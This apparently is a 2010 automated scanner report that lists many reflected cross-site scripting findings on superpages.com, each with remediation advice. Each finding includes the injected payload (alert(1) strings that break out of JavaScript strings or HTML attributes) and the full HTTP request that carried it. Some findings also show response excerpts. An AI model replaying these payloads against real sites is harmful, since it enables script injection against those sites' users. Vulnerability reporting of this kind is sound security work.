var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCoupons4aaab"-alert(1)-"3ce839e7847";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf02d"-alert(1)-"752a1001e48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profilercf02d"-alert(1)-"752a1001e48/css/alert.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb2f"-alert(1)-"d7b62d0a99e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/css6eb2f"-alert(1)-"d7b62d0a99e/alert.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6b50"-alert(1)-"14ed31f715f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/css/alert.cssb6b50"-alert(1)-"14ed31f715f HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37a6d"-alert(1)-"12e19a3b5e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler37a6d"-alert(1)-"12e19a3b5e6/js/mydir.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f663a"-alert(1)-"5390c8865a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/jsf663a"-alert(1)-"5390c8865a/mydir.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9327e"-alert(1)-"5a6fc7ac2bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profiler/js/mydir.js9327e"-alert(1)-"5a6fc7ac2bb HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0e73"-alert(1)-"1ba684b4574 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviewsc0e73"-alert(1)-"1ba684b4574/js/ajaxreviews.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12d5a"-alert(1)-"3b591ccf4d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js12d5a"-alert(1)-"3b591ccf4d7/ajaxreviews.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0b30"-alert(1)-"e73a333b107 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/ajaxreviews.jsb0b30"-alert(1)-"e73a333b107 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9fe9"-alert(1)-"0f246252d00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviewsf9fe9"-alert(1)-"0f246252d00/js/logclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8721d"-alert(1)-"1a2eb664b53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js8721d"-alert(1)-"1a2eb664b53/logclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eebf5"-alert(1)-"2efa033de7f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/logclick.jseebf5"-alert(1)-"2efa033de7f HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54f80"-alert(1)-"90b025b4504 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews54f80"-alert(1)-"90b025b4504/js/toggle.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 687c5"-alert(1)-"82327248272 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js687c5"-alert(1)-"82327248272/toggle.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c60e4"-alert(1)-"09d055d1773 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/toggle.jsc60e4"-alert(1)-"09d055d1773 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 784a5"-alert(1)-"ea9d8c74217 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews784a5"-alert(1)-"ea9d8c74217/js/toggleVote.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27727"-alert(1)-"d8ab575fbc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js27727"-alert(1)-"d8ab575fbc0/toggleVote.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99c2d"-alert(1)-"a73761957a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/js/toggleVote.js99c2d"-alert(1)-"a73761957a3 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edb22"-alert(1)-"30b48493143 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /seedb22"-alert(1)-"30b48493143/compositepage.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 986e7"-alert(1)-"fcdd42f96e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /se/compositepage.css986e7"-alert(1)-"fcdd42f96e9 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b34e3"-alert(1)-"1c02757a631 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ypb34e3"-alert(1)-"1c02757a631/js/addList.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 614f1"-alert(1)-"b4d7becfeb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js614f1"-alert(1)-"b4d7becfeb/addList.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feaa1"-alert(1)-"6db04b2d2d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js/addList.jsfeaa1"-alert(1)-"6db04b2d2d1 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7c01"-alert(1)-"7f08965b314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ypd7c01"-alert(1)-"7f08965b314/js/showHide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a47ac"-alert(1)-"23df84e8480 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/jsa47ac"-alert(1)-"23df84e8480/showHide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 909ce"-alert(1)-"f8dafda782f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yp/js/showHide.js909ce"-alert(1)-"f8dafda782f HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1292727684422-www.superpages.com-13613288-523135
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7992"-alert(1)-"6017094ff29 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/Placerville-CA/PLA-L0122828089.htm HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e7992"-alert(1)-"6017094ff29
Connection: close
Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1292727571684-www.superpages.com-13613288-39116; Domain=.superpages.com; Expires=Fri, 18-Dec-2015 02:59:31 GMT; Path=/
Set-Cookie: JSESSIONID=ED506B1A806306616FE23BFBC1073621; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 104307
Date: Sun, 19 Dec 2010 02:59:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
ecipient = "90Xu4uH6NFYK+Iqqk6+FeVzLlkKzW8jB6WlHIphJxlnVm1sNDSH6xA==";
var remote_add = "REMOTE_ADDR=174.121.222.18";
var http_user = "HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e7992"-alert(1)-"6017094ff29";
var datServ = 'http://ugc-int.superpages.com';
var imgLoc = "http://img.superpages.com/images-yp/sp/images/ugc/";
var imServ = 'http://media.superpages.com/media/photos/';
var lidforpageload = '0122
...[SNIP]...
The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c254"><script>alert(1)</script>2a8eaab5b62 was submitted in the action parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Found
Date: Sun, 19 Dec 2010 03:04:33 GMT
